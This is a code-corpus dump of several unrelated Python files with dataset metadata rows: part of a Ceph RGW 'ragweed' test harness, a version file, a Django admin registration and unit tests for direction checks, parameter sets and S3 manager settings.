bucket = self.create_raw_bucket(name)
bucket_info = self.rgw_rest_admin.get_bucket_instance_info(bucket.name)
print 'bucket_info:', bucket_info
return RBucket(self, bucket, bucket_info)
def get_bucket(self, name):
bucket = self.get_raw_bucket(name)
bucket_info = self.rgw_rest_admin.get_bucket_instance_info(bucket.name)
print 'bucket_info:', bucket_info
return RBucket(self, bucket, bucket_info)
def create_raw_bucket(self, name):
return self.conn.regular.create_bucket(name)
def get_raw_bucket(self, name):
return self.conn.regular.get_bucket(name)
def refresh_rbucket(self, rbucket):
rbucket.bucket = self.get_raw_bucket(rbucket.bucket.name)
rbucket.bucket_info = self.rgw_rest_admin.get_bucket_instance_info(rbucket.bucket.name)
class RTest:
def __init__(self):
self._name = self.__class__.__name__
self.r_buckets = []
self.init()
def create_bucket(self):
bid = len(self.r_buckets) + 1
bucket_name = suite.get_bucket_name(self._name + '.' + str(bid))
bucket_name = bucket_name.replace("_", "-")
rb = suite.zone.create_bucket(bucket_name)
self.r_buckets.append(rb)
return rb
def get_buckets(self):
for rb in self.r_buckets:
yield rb
def init(self):
pass
def prepare(self):
pass
def check(self):
pass
def to_json(self):
attrs = {}
for x in dir(self):
if x.startswith('r_'):
attrs[x] = getattr(self, x)
return json.dumps(attrs, cls=RTestJSONSerialize)
def from_json(self, s):
j = json.loads(s, object_hook=rtest_decode_json)
for e in j:
setattr(self, e, j[e])
def save(self):
suite.write_test_data(self)
def load(self):
suite.read_test_data(self)
for rb in self.r_buckets:
suite.zone.refresh_rbucket(rb)
def test(self):
suite.register_test(self)
if suite.is_preparing():
self.prepare()
self.save()
if suite.is_checking():
self.load()
self.check()
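# Example (illustrative only, not part of the original file): a minimal RTest
# subclass. prepare() runs during the "prepare" stage and every attribute whose
# name starts with "r_" is serialized to the suite's config bucket; during the
# "check"/"test" stage that state is loaded back and check() verifies it.
# The object name and payload below are assumptions.
#
# class r_example_upload(RTest):
#     def prepare(self):
#         rb = self.create_bucket()
#         k = Key(rb.bucket)
#         k.key = 'obj-1'
#         k.set_contents_from_string('payload')
#         self.r_obj_name = k.key
#
#     def check(self):
#         for rb in self.get_buckets():
#             key = rb.bucket.get_key(self.r_obj_name)
#             eq(key.get_contents_as_string(), 'payload')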
def read_config(fp):
config = bunch.Bunch()
g = yaml.safe_load_all(fp)
for new in g:
print bunch.bunchify(new)
config.update(bunch.bunchify(new))
return config
str_config_opts = [
'user_id',
'access_key',
'secret_key',
'host',
'ceph_conf',
'bucket_prefix',
]
int_config_opts = [
'port',
]
bool_config_opts = [
'is_secure',
]
def dict_find(d, k):
if d.has_key(k):
return d[k]
return None
class RagweedEnv:
def __init__(self):
self.config = bunch.Bunch()
cfg = ConfigParser.RawConfigParser()
try:
path = os.environ['RAGWEED_CONF']
except KeyError:
raise RuntimeError(
'To run tests, point environment '
+ 'variable RAGWEED_CONF to a config file.',
)
with file(path) as f:
cfg.readfp(f)
for section in cfg.sections():
try:
(section_type, name) = section.split(None, 1)
if not self.config.has_key(section_type):
self.config[section_type] = bunch.Bunch()
self.config[section_type][name] = bunch.Bunch()
cur = self.config[section_type]
except ValueError:
section_type = ''
name = section
self.config[name] = bunch.Bunch()
cur = self.config
cur[name] = bunch.Bunch()
for var in str_config_opts:
try:
cur[name][var] = cfg.get(section, var)
except ConfigParser.NoOptionError:
pass
for var in int_config_opts:
try:
cur[name][var] = cfg.getint(section, var)
except ConfigParser.NoOptionError:
pass
for var in bool_config_opts:
try:
cur[name][var] = cfg.getboolean(section, var)
except ConfigParser.NoOptionError:
pass
print json.dumps(self.config)
rgw_conf = self.config.rgw
try:
self.bucket_prefix = rgw_conf.bucket_prefix
except:
self.bucket_prefix = 'ragweed'
conn = bunch.Bunch()
for (k, u) in self.config.user.iteritems():
conn[k] = RGWConnection(u.access_key, u.secret_key, rgw_conf.host, dict_find(rgw_conf, 'port'), dict_find(rgw_conf, 'is_secure'))
self.zone = RZone(conn)
self.suite = RSuite('ragweed', self.bucket_prefix, self.zone, os.environ['RAGWEED_STAGES'])
try:
self.ceph_conf = self.config.rados.ceph_conf
except:
raise RuntimeError(
'ceph_conf is missing under the [rados] section in ' + os.environ['RAGWEED_CONF']
)
self.rados = rados.Rados(conffile=self.ceph_conf)
self.rados.connect()
pools = self.rados.list_pools()
for pool in pools:
print "rados pool>", pool
def setup_module():
global ragweed_env
global suite
ragweed_env = RagweedEnv()
suite = ragweed_env.suite
| 29.649351 | 141 | 0.593663 | 12,492 | 0.911958 | 177 | 0.012922 | 0 | 0 | 0 | 0 | 796 | 0.058111 |
6a27987a8cba79e77e7ec06fe0349b417f6ae225 | 44 | py | Python | exposing/_version.py | w4k2/exposing | 6abbced18aa567ed45426ba915f3b56e7aeca028 | [
"BSD-3-Clause"
] | null | null | null | exposing/_version.py | w4k2/exposing | 6abbced18aa567ed45426ba915f3b56e7aeca028 | [
"BSD-3-Clause"
] | 1 | 2018-05-28T10:35:02.000Z | 2018-05-28T10:35:02.000Z | exposing/_version.py | w4k2/exposing | 6abbced18aa567ed45426ba915f3b56e7aeca028 | [
"BSD-3-Clause"
] | null | null | null | """
``exposing``
"""
__version__ = '0.2.2'
| 7.333333 | 21 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 27 | 0.613636 |
6a27b2bcfa7e4d8b0487cdb6693479a656fd6bb3 | 136 | py | Python | opensteer/teams/admin.py | reckonsys/opensteer | 3c47bcf0a8de8e363ce8cced02827fe21a0d406a | [
"MIT"
] | 5 | 2019-10-14T05:48:43.000Z | 2021-08-29T17:42:48.000Z | opensteer/teams/admin.py | reckonsys/opensteer | 3c47bcf0a8de8e363ce8cced02827fe21a0d406a | [
"MIT"
] | 26 | 2019-09-19T08:51:45.000Z | 2022-03-12T00:05:29.000Z | opensteer/teams/admin.py | reckonsys/opensteer | 3c47bcf0a8de8e363ce8cced02827fe21a0d406a | [
"MIT"
] | 1 | 2020-01-08T21:50:05.000Z | 2020-01-08T21:50:05.000Z | from django.contrib import admin
from opensteer.teams.models import Team, Member
admin.site.register(Team)
admin.site.register(Member)
| 22.666667 | 47 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
6a2905a1e278bec5cf1d153f6d2fadf970789157 | 2,657 | py | Python | tests/test_utils.py | ozora-ogino/tflite-human-tracking | d1be51c628e1464b5e2953a611df6e974a9ffbaa | [
"MIT"
] | 3 | 2021-12-20T00:43:28.000Z | 2022-03-12T00:54:42.000Z | tests/test_utils.py | ozora-ogino/tflite-human-tracking | d1be51c628e1464b5e2953a611df6e974a9ffbaa | [
"MIT"
] | null | null | null | tests/test_utils.py | ozora-ogino/tflite-human-tracking | d1be51c628e1464b5e2953a611df6e974a9ffbaa | [
"MIT"
] | 5 | 2021-12-03T08:59:18.000Z | 2022-03-17T11:25:38.000Z | from src.utils import check_direction, direction_config, is_intersect
# pylint:disable=unexpected-keyword-arg
class TestCheckDirection:
def test_true(self):
"""Test true case."""
directions = {
"right": {"prev_center": [0, 0], "current_center": [20, 0], "expect": True},
"left": {"prev_center": [10, 0], "current_center": [0, 0], "expect": True},
"top": {"prev_center": [0, 10], "current_center": [0, 0], "expect": True},
"bottom": {"prev_center": [0, 0], "current_center": [0, 10], "expect": True},
}
for direction_str, args in directions.items():
expect = args.pop("expect")
result = check_direction(**args, direction=direction_config[direction_str])
assert result == expect
def test_false(self):
"""Test false case."""
directions = {
"right": {"prev_center": [0, 0], "current_center": [0, 0], "expect": False},
# This is right.
"left": {"prev_center": [0, 0], "current_center": [10, 0], "expect": False},
# This is bottom.
"top": {"prev_center": [0, 0], "current_center": [0, 10], "expect": False},
# This is top.
"bottom": {"prev_center": [0, 10], "current_center": [0, 0], "expect": False},
}
for direction_str, args in directions.items():
expect = args.pop("expect")
result = check_direction(**args, direction=direction_config[direction_str])
assert result == expect
def test_direction_none(self):
"""Check if always return true when direction is set None."""
args = [
{"prev_center": [0, 0], "current_center": [0, 0]}, # No movement.
{"prev_center": [0, 0], "current_center": [10, 0]}, # Right
{"prev_center": [10, 0], "current_center": [0, 0]}, # Left.
{"prev_center": [0, 10], "current_center": [0, 0]}, # Top.
{"prev_center": [0, 0], "current_center": [0, 10]}, # Bottom.
]
for arg in args:
# If the direction is None, always return True.
result = check_direction(**arg, direction=None)
assert result == True
class TestIsIntersect:
def test_true(self):
"""Test true case."""
args = {"A": [10, 0], "B": [10, 30], "C": [0, 10], "D": [30, 0]}
result = is_intersect(**args)
assert result == True
def test_false(self):
"""Test false case."""
args = {"A": [10, 0], "B": [10, 30], "C": [0, 10], "D": [0, 0]}
result = is_intersect(**args)
assert result == False
| 42.174603 | 90 | 0.530297 | 2,540 | 0.955965 | 0 | 0 | 0 | 0 | 0 | 0 | 856 | 0.322168 |
6a296c2965af2f5264f62e16fe377851c022b76e | 44 | py | Python | scpp_base/scpp_base/src/db/__init__.py | scorelab/social-currency | f539893104bdfe098cfa58c8d9fabcbb00874c52 | [
"Apache-2.0"
] | 4 | 2018-10-02T06:31:18.000Z | 2019-11-16T15:21:34.000Z | scpp_base/scpp_base/src/db/__init__.py | horizon00/social-currency | f539893104bdfe098cfa58c8d9fabcbb00874c52 | [
"Apache-2.0"
] | 2 | 2017-12-06T11:54:14.000Z | 2019-11-11T11:34:06.000Z | scpp_base/scpp_base/src/db/__init__.py | horizon00/social-currency | f539893104bdfe098cfa58c8d9fabcbb00874c52 | [
"Apache-2.0"
] | 5 | 2017-02-27T10:10:41.000Z | 2019-11-11T11:45:37.000Z | __all__ = ["db_handler","coin_value_handler"] | 44 | 44 | 0.772727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.727273 |
6a29d2f85143afe8ae63f5fd3499c691c4db69b3 | 2,792 | py | Python | test/test_parameter_set.py | crest-cassia/caravan_search_engine | 5c3bd3176b44e8c3145ba67b4240678e18a1394e | [
"MIT"
] | null | null | null | test/test_parameter_set.py | crest-cassia/caravan_search_engine | 5c3bd3176b44e8c3145ba67b4240678e18a1394e | [
"MIT"
] | null | null | null | test/test_parameter_set.py | crest-cassia/caravan_search_engine | 5c3bd3176b44e8c3145ba67b4240678e18a1394e | [
"MIT"
] | null | null | null | import unittest
from caravan.tables import Tables
from caravan.parameter_set import ParameterSet
class ParameterSetTest(unittest.TestCase):
def setUp(self):
self.t = Tables.get()
self.t.clear()
def test_ps(self):
ps = ParameterSet(500, (2, 3, 4, 5))
self.assertEqual(ps.id, 500)
self.assertEqual(ps.params, (2, 3, 4, 5))
self.assertEqual(ps.run_ids, [])
    def test_find_or_create_new(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ps.id, 0)
self.assertEqual(ps.params, (0, 1, 2, 3))
self.assertEqual(len(ParameterSet.all()), 1)
ps2 = ParameterSet.find_or_create(3, 4, 5, 6)
self.assertEqual(len(ParameterSet.all()), 2)
def test_find_or_create(self):
ps1 = ParameterSet.find_or_create(0, 1, 2, 3)
ps2 = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ps1, ps2)
self.assertEqual(len(ParameterSet.all()), 1)
def test_create_runs(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
runs = ps.create_runs_upto(3)
self.assertEqual([r.id for r in runs], [0, 1, 2])
self.assertEqual([r.seed for r in runs], [0, 1, 2])
ps2 = ParameterSet.find_or_create(0, 1, 3, 4)
runs = ps2.create_runs_upto(3)
self.assertEqual([r.id for r in runs], [3, 4, 5])
self.assertEqual([r.seed for r in runs], [0, 1, 2])
def test_is_finished(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ps.is_finished(), True)
runs = ps.create_runs_upto(1)
self.assertFalse(ps.is_finished())
self.assertEqual(len(ps.finished_runs()), 0)
runs[0].store_result([1.0, 2.0, 3.0], 0, 3, 111, 222)
self.assertTrue(ps.is_finished())
self.assertEqual(len(ps.finished_runs()), 1)
def test_average_results(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
runs = ps.create_runs_upto(3)
self.assertEqual(ps.average_results(), ())
for (i, r) in enumerate(runs):
r.store_result([1.0 + i, 2.0 + i, 3.0 + 1], 0, 3, 111, 222)
self.assertEqual(ps.average_results(), (2.0, 3.0, 4.0))
def test_all(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ParameterSet.all(), [ps])
ps2 = ParameterSet.find_or_create(0, 1, 2, 4)
self.assertEqual(ParameterSet.all(), [ps, ps2])
self.assertEqual(len(ParameterSet.all()), 2)
def test_find(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
ps2 = ParameterSet.find_or_create(0, 1, 2, 4)
pid = ps2.id
self.assertEqual(pid, 1)
self.assertEqual(ParameterSet.find(1), ps2)
if __name__ == '__main__':
unittest.main()
| 36.736842 | 71 | 0.609599 | 2,643 | 0.946633 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.003582 |
6a29e328b66b3aa40c02b6c801e1beb3b20cffb7 | 1,470 | py | Python | tests/unit/transport/s3/test_settings.py | TinkoffCreditSystems/overhave | b0ab705ef5c5c5a65fa0b14b173b64fd7310e187 | [
"Apache-2.0"
] | 33 | 2021-02-01T15:49:37.000Z | 2021-12-20T00:44:43.000Z | tests/unit/transport/s3/test_settings.py | TinkoffCreditSystems/overhave | b0ab705ef5c5c5a65fa0b14b173b64fd7310e187 | [
"Apache-2.0"
] | 46 | 2021-02-03T12:56:52.000Z | 2021-12-19T18:50:27.000Z | tests/unit/transport/s3/test_settings.py | TinkoffCreditSystems/overhave | b0ab705ef5c5c5a65fa0b14b173b64fd7310e187 | [
"Apache-2.0"
] | 1 | 2021-12-07T09:02:44.000Z | 2021-12-07T09:02:44.000Z | import pytest
from pydantic import ValidationError
from overhave.transport import OverhaveS3ManagerSettings
class TestS3ManagerSettings:
""" Unit tests for :class:`OverhaveS3ManagerSettings`. """
@pytest.mark.parametrize("test_s3_enabled", [False])
def test_disabled(self, test_s3_enabled: bool) -> None:
settings = OverhaveS3ManagerSettings(enabled=test_s3_enabled)
assert not settings.enabled
assert not settings.url
assert not settings.access_key
assert not settings.secret_key
@pytest.mark.parametrize("test_s3_enabled", [True])
def test_empty_enabled(self, test_s3_enabled: bool) -> None:
with pytest.raises(ValidationError):
OverhaveS3ManagerSettings(enabled=test_s3_enabled)
@pytest.mark.parametrize("test_s3_autocreate_buckets", [False, True], indirect=True)
@pytest.mark.parametrize("test_s3_enabled", [True], indirect=True)
def test_correct_enabled(
self,
test_s3_enabled: bool,
test_s3_autocreate_buckets: bool,
test_s3_manager_settings: OverhaveS3ManagerSettings,
) -> None:
assert test_s3_manager_settings.enabled == test_s3_enabled
assert test_s3_manager_settings.url
assert test_s3_manager_settings.access_key
assert test_s3_manager_settings.secret_key
assert test_s3_manager_settings.verify
assert test_s3_manager_settings.autocreate_buckets == test_s3_autocreate_buckets
| 39.72973 | 88 | 0.742857 | 1,358 | 0.92381 | 0 | 0 | 1,249 | 0.84966 | 0 | 0 | 137 | 0.093197 |